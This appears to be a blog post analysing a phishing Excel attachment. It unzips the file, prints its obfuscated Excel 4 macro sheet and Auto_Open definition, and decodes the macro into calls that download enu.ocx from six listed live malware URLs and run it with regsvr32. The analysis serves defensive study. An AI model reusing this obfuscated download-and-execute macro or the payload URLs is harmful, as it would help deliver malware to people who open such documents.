Malware in Excel?

Background

I saw a post on facebook from a user where he mentioned that he has received an email from an internet provider with excel file as attachment but the email was different from regular emails.

This post attracted me and I decided to dig into this attachment and discover is it a malware or not and if it is what the malware does.

So, I asked for the excel file and downloaded the file in my machine.

Identifing that Excel is Infected

The file extension that I downloaded was .xlsx, if you are familiar with the format then it is just a zip file with bunch of .xml files. So I unziped the files

$ unzip Payment\ details.xlsx 
Archive:  Payment details.xlsx
Aspose.Cells v22.2.5
  inflating: xl/worksheets/sheet2.xml  
  inflating: xl/worksheets/sheet3.xml  
  inflating: xl/worksheets/sheet5.xml  
  inflating: xl/drawings/drawing1.xml  
  inflating: xl/macrosheets/sheet1.xml  
  inflating: xl/printerSettings/printerSettings1.bin  
  inflating: xl/worksheets/sheet1.xml  
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: xl/theme/theme1.xml     
  inflating: xl/workbook.xml         
  inflating: xl/calcChain.xml        
  inflating: xl/media/image1.png     
  inflating: xl/worksheets/sheet4.xml  
  inflating: xl/styles.xml           
  inflating: xl/sharedStrings.xml    
  inflating: [Content_Types].xml     
  inflating: xl/worksheets/_rels/sheet2.xml.rels  
  inflating: xl/drawings/_rels/drawing1.xml.rels  
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/_rels/workbook.xml.rels  
  inflating: _rels/.rels             

After unzipping the file I check the macro files to see if it really has some malware or not: (output is beautified so it will make it easy to read the code)

$ cat xl/macrosheets/sheet1.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<worksheet
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
	xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
	xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing"
	xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"
	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3"
	xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
	xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
	xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
	xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
	xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3"
	xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{00000000-0001-0000-0300-000000000000}" xr:uid="{05bb2f47-8f87-4278-9454-68d76267ebb2}">
	<dimension ref="D7" />
	<sheetViews>
		<sheetView showFormulas="1" workbookViewId="0" topLeftCell="A1" />
	</sheetViews>
	<sheetFormatPr defaultColWidth="8.714285714285714" defaultRowHeight="15" />
	<cols>
		<col min="1" max="3" width="8.714285714285714" style="1" />
		<col min="4" max="4" width="8.714285714285714" style="1" hidden="1" customWidth="1" />
		<col min="5" max="16384" width="8.714285714285714" style="1" />
	</cols>
	<sheetData>
		<row r="7" spans="4:4" ht="15">
			<c r="D7" s="1" t="b">
				<f>FORMULA('Je1'!D17,'Je2'!E6)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G18&amp;Lefasbor1!R10&amp;Lefasbor1!P5,D10)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH1"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G20&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D12)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH2"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G22&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D14)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH3"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!G24&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D16)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH4"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!I18&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D18)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH5"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!L2&amp;Vfrbuk1!B15&amp;Vfrbuk1!B15&amp;Lefasbor1!E4&amp;Lefasbor1!B8&amp;Lefasbor1!D12&amp;'Je2'!E6&amp;Lefasbor1!G9&amp;Lefasbor1!K2&amp;Lefasbor1!I20&amp;Lefasbor1!R10&amp;Lefasbor1!P5&amp;Vfrbuk1!P13,D20)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!J11&amp;Vfrbuk1!B18&amp;Vfrbuk1!P11&amp;"GFGH6"&amp;Lefasbor1!M7&amp;Vfrbuk1!H9&amp;Vfrbuk1!B15&amp;Vfrbuk1!I17&amp;Vfrbuk1!I3&amp;Vfrbuk1!H13&amp;Vfrbuk1!P11&amp;Vfrbuk1!K9&amp;Vfrbuk1!P13&amp;Vfrbuk1!P7&amp;Vfrbuk1!P13,D22)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!H13&amp;Vfrbuk1!N4&amp;Vfrbuk1!H13&amp;Vfrbuk1!H9&amp;Vfrbuk1!P11&amp;Vfrbuk1!P15&amp;Vfrbuk1!H9&amp;Vfrbuk1!P20&amp;Lefasbor1!T3&amp;Lefasbor1!Q14&amp;Lefasbor1!N13&amp;Lefasbor1!J14&amp;Lefasbor1!N3&amp;Vfrbuk1!P15&amp;Vfrbuk1!P13,D24)=FORMULA(Vfrbuk1!P22&amp;Vfrbuk1!G24&amp;Vfrbuk1!H13&amp;Vfrbuk1!E6&amp;Vfrbuk1!E11&amp;Vfrbuk1!F4&amp;Vfrbuk1!K23&amp;Vfrbuk1!P11&amp;Vfrbuk1!P13,D33)</f>
				<v>1</v>
			</c>
		</row>
	</sheetData>
	<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3" />
	<pageSetup orientation="portrait" />
</worksheet>   

We can see the function FORMULA which is Excel 4 macro functions. It was included in Excel 4, but when Excel 5 came out (in 1993!) this type of macros was replaced with VBA. Still though, in 2022, Microsoft Excel supports Excel 4 macros for backwards compatibility reasons. And recently, phishers have been using this old-school type of macro for malware.

So we have confirmed the excel file indeed contains the malware.

Digging into the malware

As it is using the macro 4, I quickly opened the macro 4 function references and checked the FORMULA function.

  • The FORMULA function takes two arguments, formula_text and reference. It takes the value in formula_text and places it in the spreadsheet at the location defined by reference.

But the text in FORMULA seemes unreadable (they have done this to protect from antivirus and encrypt the function calls).

Lets make the macro function abit readbale. For this I chanded the &amp; with the newline.

FORMULA('Je1'!D17,'Je2'!E6)=FORMULA(Vfrbuk1!P22
Vfrbuk1!H9
Vfrbuk1!L2
Vfrbuk1!B15
Vfrbuk1!B15
Lefasbor1!E4
Lefasbor1!B8
Lefasbor1!D12
'Je2'!E6
Lefasbor1!G9
Lefasbor1!K2
Lefasbor1!G18
Lefasbor1!R10
Lefasbor1!P5,D10)
(....) (redacted to save space)

But still there are some random texts like Vfrbuk1 and Lefasbor1 which we don't know what it is.

In Excel we can reference a data field using the syntax like this SheetName!ColumnRows , and the format Vfrbuk1!H9 matches the format. So it looks liks Vfrbuk1 and Lefasbor1 represents some sheet in excel. We can check the name of sheets in excel from xl/workbook.xml

$ cat xl/workbook.xml

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<workbook
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
	xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" mc:Ignorable="x15 xr xr6 xr10 xr2"
	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
	xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main"
	xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
	xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10"
	xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
	xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6">
	<fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527" />
	<workbookPr />
	<mc:AlternateContent
		xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
		<mc:Choice Requires="x15">
			<x15ac:absPath url="C:\Users\Admin\Desktop\File\1mar\CIR-ZV\"
				xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" />
			</mc:Choice>
		</mc:AlternateContent>
		<bookViews>
			<workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" />
		</bookViews>
		<sheets>
			<sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId3" />
			<sheet name="Sheet" sheetId="8" r:id="rId4" />
			<sheet name="Lefasbor1" sheetId="3" state="hidden" r:id="rId5" />
			<sheet name="EFALGV" sheetId="4" state="hidden" r:id="rId6" />
			<sheet name="Je1" sheetId="5" state="hidden" r:id="rId7" />
			<sheet name="Je2" sheetId="6" state="hidden" r:id="rId8" />
		</sheets>
		<definedNames>
			<definedName name="DDDDD1">#REF!</definedName>
			<definedName name="DDWD">#REF!</definedName>
			<definedName name="DDWD1">#REF!</definedName>
			<definedName name="DDWD2">#REF!</definedName>
			<definedName name="DDWD3">#REF!</definedName>
			<definedName name="DDWD4">#REF!</definedName>
			<definedName name="GFGH1">EFALGV!$D$10</definedName>
			<definedName name="GFGH2">EFALGV!$D$12</definedName>
			<definedName name="GFGH3">EFALGV!$D$14</definedName>
			<definedName name="GFGH4">EFALGV!$D$16</definedName>
			<definedName name="GFGH5">EFALGV!$D$18</definedName>
			<definedName name="GFGH6">EFALGV!$D$20</definedName>
			<definedName name="KKLD8">#REF!</definedName>
			<definedName name="Auto_Open">EFALGV!$D$1</definedName>
		</definedNames>
		<calcPr calcId="191029" />
		<extLst>
			<ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}"
				xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures">
				<xcalcf:calcFeatures>
					<xcalcf:feature name="microsoft.com:RD" />
					<xcalcf:feature name="microsoft.com:FV" />
				</xcalcf:calcFeatures>
			</ext>
		</extLst>
	</workbook>    

Indeed we were right <sheet name="Vfrbuk1" sheetId="2" state="hidden" r:id="rId3" />, the string Vfrbuk1 represent the sheet 2. We can see this sheet in xl/worksheets

[/tmp/ok/test/xl/worksheets]
└─$ ls -la
total 36
drwxr-xr-x 3 parallels parallels 4096 Mar  4 15:46 .
drwxr-xr-x 9 parallels parallels 4096 Mar  4 15:46 ..
drwxr-xr-x 2 parallels parallels 4096 Mar  4 15:46 _rels
-rw-r--r-- 1 parallels parallels 5229 Jan  1  1980 sheet1.xml
-rw-r--r-- 1 parallels parallels 1363 Jan  1  1980 sheet2.xml
-rw-r--r-- 1 parallels parallels 3907 Jan  1  1980 sheet3.xml
-rw-r--r-- 1 parallels parallels 1470 Jan  1  1980 sheet4.xml
-rw-r--r-- 1 parallels parallels 1385 Jan  1  1980 sheet5.xml

If we check the sheet1.xml

$ cat sheet1.xml
<?xml version=".0" encoding="UTF-8" standalone="yes"?>
<worksheet
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"
	xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"
	xmlns:xdr="http://schemas.openxmlformats.org/drawingml/2006/spreadsheetDrawing"
	xmlns:x14="http://schemas.microsoft.com/office/spreadsheetml/2009/9/main"
	xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3"
	xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"
	xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main"
	xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision"
	xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"
	xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xr:uid="{00000000-0001-0000-0100-000000000000}">
	<dimension ref="A2:Q37" />
	<sheetViews>
		<sheetView workbookViewId="0" topLeftCell="A1" />
	</sheetViews>
	<sheetFormatPr defaultRowHeight="15" />
	<cols>
		<col min="1" max="16384" width="9.142857142857142" style="1" />
	</cols>
	<sheetData>
		<row r="2" spans="5:12" ht="15">
			<c r="E2" s="1" t="str">
				<f>CHAR(113-2)</f>
				<v>o</v>
			</c>
			<c r="G2" s="1" t="str">
				<f>CHAR(111-6)</f>
				<v>i</v>
			</c>
			<c r="L2" s="1" t="str">
				<f>CHAR(71-6)</f>
				<v>A</v>
			</c>
		</row>
    (....) [redacted to save space]
		<row r="37" spans="11:11" ht="15">
			<c r="K37" s="1">
				<f>_xlfn.ARABIC("CI")</f>
				<v>101</v>
			</c>
		</row>
	</sheetData>
	<pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3" />
	<pageSetup orientation="portrait" paperSize="9" r:id="rId1" />
</worksheet>

In the xml file the only important thing for us is <c r="E2" s="1" t="str"> and <v>o</v>. Because. the encrypted text in macro formula function i.e Vfrbuk1!E2 can be translated into 'o'.

Like this we can decode all the encrypted macro function and this is what I get after decoing. (There might me some problem with the decoded version because I am lazy to see and decode everything perfectly lol)

=FORMULA(=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,6,..\enu.ocx",0,0),D10)
=FORMULA(=IF("GFGH1"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,7,..\enu.ocx",0,0),D12)
=FORMULA(=IF("GFGH2"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,8,..\enu.ocx",0,0),D14)
=FORMULA(=IF("GFGH3"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,9,..\enu.ocx",0,0),D16)
=FORMULA(=IF("GFGH4"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,10,..\enu.ocx",0,0),D18)
=FORMULA(=IF("GFGH5"<0,=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,11,..\enu.ocx",0,0),D20)
=FORMULA(=IF("GFGH6"<0,=CLOSE(0),),D22)
=FORMULA(=EXEC("C:435 2<0, ..\enu.ocx"),D24)
=FORMULA(=RETURN(),D33)

The macro download the file called enu.ocx from remote url and execute it silently. The number like 6,7,8,9,10,11 are the place holders for the remote urls. We can see those urls in xl/sharedStrings.xml

$ cat xl/sharedStrings.xml
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<sst
	xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="13" uniqueCount="13">
	<si>
		<t>G</t>
	</si>
	<si>
		<t>!</t>
	</si>
	<si>
		<t>/</t>
	</si>
	<si>
		<t>SysWow64\</t>
	</si>
	<si>
		<t>\Windows\</t>
	</si>
	<si>
		<t>r"&amp;"eg"&amp;"sv"&amp;"r32.exe</t>
	</si>
	<si>
		<t>"http://piajimenez.com/Fox-C/dS4nv3spYd0DZsnwLqov/","</t>
	</si>
	<si>
		<t>"http://inopra.com/wp-includes/3zGnQGNCvIKuvrO7T/","</t>
	</si>
	<si>
		<t>"http://biomedicalpharmaegypt.com/sapbush/BKEaVq1zoyJssmUoe/","</t>
	</si>
	<si>
		<t>"https://getlivetext.com/Pectinacea/AL5FVpjleCW/","</t>
	</si>
	<si>
		<t>"http://janshabd.com/Zgye2/","</t>
	</si>
	<si>
		<t>"https://justforanime.com/stratose/PonwPXCl/","</t>
	</si>
	<si>
		<t>e</t>
	</si>
</sst> 

Here are all the urls the macro send request to download the enu.ocx file.

If you google any of the url you can see the list of other website delivering the similar malware. https://urlhaus.abuse.ch/downloads/text_recent/